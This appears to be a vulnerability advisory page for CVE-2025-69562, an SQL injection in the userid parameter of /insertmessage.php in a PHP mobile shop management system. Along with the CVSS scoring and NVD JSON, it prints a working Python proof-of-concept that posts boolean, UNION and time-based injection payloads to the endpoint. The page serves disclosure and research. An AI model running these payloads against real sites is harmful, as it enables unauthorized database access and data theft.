Security Vulnerability Report
中文
CVE-2025-69562 CVSS 9.8 CRITICAL

CVE-2025-69562

Published: 2026-01-27 17:16:10
Last Modified: 2026-02-03 14:02:21

Description

code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /insertmessage.php via the userid parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Mobile Shop Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69562 SQL Injection PoC # Target: code-projects Mobile Shop Management System 1.0 # Vulnerable Parameter: userid in /insertmessage.php def sql_injection_test(target_url): """ Test for SQL injection vulnerability in Mobile Shop Management System """ # Basic injection test - causes SQL error if vulnerable vulnerable_endpoint = f"{target_url}/insertmessage.php" # Normal request normal_payload = {"userid": "1", "message": "test"} # SQL injection payloads payloads = [ "1' OR '1'='1", "1' UNION SELECT 1,2,3--", "1' AND SLEEP(5)--", "1' OR 1=1 LIMIT 1--" ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerable endpoint: {vulnerable_endpoint}") # Test normal request try: response = requests.post(vulnerable_endpoint, data=normal_payload, timeout=10) print(f"[+] Normal request status: {response.status_code}") except Exception as e: print(f"[-] Error with normal request: {e}") # Test injection payloads for i, payload in enumerate(payloads, 1): try: exploit_data = {"userid": payload, "message": "test"} response = requests.post(vulnerable_endpoint, data=exploit_data, timeout=15) print(f"[+] Payload {i}: {payload}") print(f" Status: {response.status_code}") if len(response.text) > 0: print(f" Response length: {len(response.text)}") except requests.exceptions.Timeout: print(f"[!] Payload {i} caused timeout - potential blind SQL injection") except Exception as e: print(f"[-] Error with payload {i}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://localhost/mobileshop" sql_injection_test(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69562", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:09.863", "lastModified": "2026-02-03T14:02:21.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /insertmessage.php via the userid parameter."}, {"lang": "es", "value": "code-projects Mobile Shop Management System 1.0 es vulnerable a inyección SQL en /insertmessage.php a través del parámetro userid."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "958D1268-CF0E-40EF-A202-4E11EED70E06"}]}]}], "references": [{"url": "https://gist.github.com/lih28984-commits/a847a034c3bb626904dcc6ab7576257f", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gitee.com/Z_180yc/zyy/issues/IDC5FU", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}